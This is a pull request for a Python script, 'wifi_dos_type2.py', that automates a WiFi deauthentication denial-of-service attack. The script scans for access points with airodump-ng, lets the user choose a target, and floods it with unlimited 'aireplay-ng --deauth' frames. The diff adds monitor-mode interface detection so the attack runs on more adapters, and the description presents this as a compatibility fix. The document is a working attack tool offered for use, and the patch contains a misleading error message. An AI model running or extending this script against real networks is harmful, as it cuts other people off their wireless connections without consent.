### PR TITLE
Fix Monitor Mode Detection for Various Network Adapters

### DIFF
--- a/wifi_dos_type2.py
+++ b/wifi_dos_type2.py
@@ -24,6 +24,50 @@ active_wireless_networks = []
 # If so we return False so we don't add it again.
 # If it is not in the lst we return True which will instruct the elif 
 # statement to add it to the lst.
+
+def get_monitor_interface(managed_iface):
+    """
+    Finds the corresponding monitor mode interface for a given managed interface.
+    The monitor interface can be wlanXmon, monX, or even remain as wlanX.
+
+    Args:
+        managed_iface (str): The name of the managed interface (e.g., wlan0, wlan1, wlan2).
+
+    Returns:
+        str or None: The matching monitor mode interface (e.g., wlan0mon, mon0, wlan0) or None if not found.
+    """
+    # Extract the number from the managed interface (e.g., wlan0 → 0, wlan2 → 2)
+    match = re.search(r"(\d+)$", managed_iface)
+    if not match:
+        print(f"Error: Could not extract number from {managed_iface}")
+        return None
+    
+    iface_number = match.group()  # Extracted number as a string
+
+    # Run 'iw dev' to get the list of interfaces and their modes
+    iw_result = subprocess.run(["iw", "dev"], capture_output=True, text=True).stdout
+
+    # Look for interfaces in monitor mode
+    monitor_interfaces = {}
+    iface_name = None
+    monitor_mode = False
+
+    for line in iw_result.split("\n"):
+        line = line.strip()
+        if line.startswith("Interface "):  
+            iface_name = line.split()[1]  # Get the interface name
+            monitor_mode = False  # Reset monitor mode flag for the new interface
+        if "type monitor" in line and iface_name:
+            monitor_interfaces[iface_name] = True  # Store as monitor mode
+
+    # Match a monitor mode interface with the same number
+    for iface in monitor_interfaces.keys():
+        if re.search(rf"{iface_number}(mon)?$", iface):  # Match wlan0mon, mon0, or wlan0
+            return iface  
+
+    return None  # No matching monitor mode interface found
+    
+
 def check_for_essid(essid, lst):
     check_status = True
 
@@ -124,7 +168,15 @@ put_in_monitored_mode = subprocess.run(["sudo", "airmon-ng", "start", hacknic])
 # The Popen method opens a pipe from a command. The output is an open file that can be accessed by other programs.
 # We run the iwconfig command to look for wireless interfaces.
 # Discover access points
-discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", hacknic + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+
+# Get the actual monitor mode name for the selected interface
+hacknic = get_monitor_interface(hacknic)
+
+if not hacknic:
+    print("Putting Wifi adapter into monitored mode:")
+    exit()
+
+discover_access_points = subprocess.Popen(["sudo", "airodump-ng","-w" ,"file","--write-interval", "1","--output-format", "csv", hacknic], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
 
 # Loop that shows the wireless access points. We use a try except block and we will quit the loop by pressing ctrl-c.
 try:
@@ -178,10 +230,10 @@ hackchannel = active_wireless_networks[int(choice)]["channel"].strip()
 
 # Change to the channel we want to perform the DOS attack on. 
 # Monitoring takes place on a different channel and we need to set it to that channel. 
-subprocess.run(["airmon-ng", "start", hacknic + "mon", hackchannel])
+subprocess.run(["airmon-ng", "start", hacknic, hackchannel])
 
 # Deauthenticate clients. We run it with Popen and we send the output to subprocess.DEVNULL and the errors to subprocess.DEVNULL. We will thus run deauthenticate in the background.
-subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)] + "mon"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 
+subprocess.Popen(["aireplay-ng", "--deauth", "0", "-a", hackbssid, check_wifi_result[int(wifi_interface_choice)]], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) 
 
 # We run an infinite loop which you can quit by presses ctrl-c. The deauthentication will stop when we stop the script.
 try:
@@ -190,8 +242,6 @@ try:
 except KeyboardInterrupt:
     print("Stop monitoring mode")
     # We run a subprocess.run command where we stop monitoring mode on the network adapter.
-    subprocess.run(["airmon-ng", "stop", hacknic + "mon"])
+    subprocess.run(["airmon-ng", "stop", hacknic])
     print("Thank you! Exiting now")
 
-
-    


### PR DESCRIPTION
## Description

This update resolves an issue where the script was not compatible with many popular network adapters, such as the TP-Link WN722N. These adapters retain the same interface name in both managed and monitor modes, meaning they do not append "mon" at the end (e.g., `wlan0` remains `wlan0` in monitor mode, instead of `wlan0mon`).

Previously, the script assumed that the monitor mode interface would always be named `wlanXmon`, which caused compatibility issues. This update introduces a feature that automatically finds the correct monitor mode version of the selected interface, making it compatible with adapters using different naming conventions.

## Changes

- Implemented a function to detect the correct monitor mode interface, regardless of naming convention.
- Supports both single and multiple interfaces.
- Ensures that interfaces in monitor mode are correctly identified, even if their names remain unchanged.

## Demonstration

### Example 1: Adapter that appends "mon"
**Actual Interface Name:** `wlan0 (Managed Mode) → wlan0mon (Monitor Mode)`  
**Expected Detection:** `Monitor mode interface detected: wlan0mon`

### Example 2: Adapter that keeps the same name
**Actual Interface Name:** `wlan0 (Managed Mode) → wlan0 (Monitor Mode)`  
**Expected Detection:** `Monitor mode interface detected: wlan0`

### Example 3: Multiple interfaces
**Actual Interface Names:**  
`wlan1 (Managed Mode) → wlan1mon (Monitor Mode)`  
`wlan2 (Managed Mode) → wlan2 (Monitor Mode)`  
**Expected Detection:**  
`Monitor mode interface detected: wlan1mon`  
`Monitor mode interface detected: wlan2`

This fix enhances the script's flexibility and compatibility, making it more reliable across different network adapters.
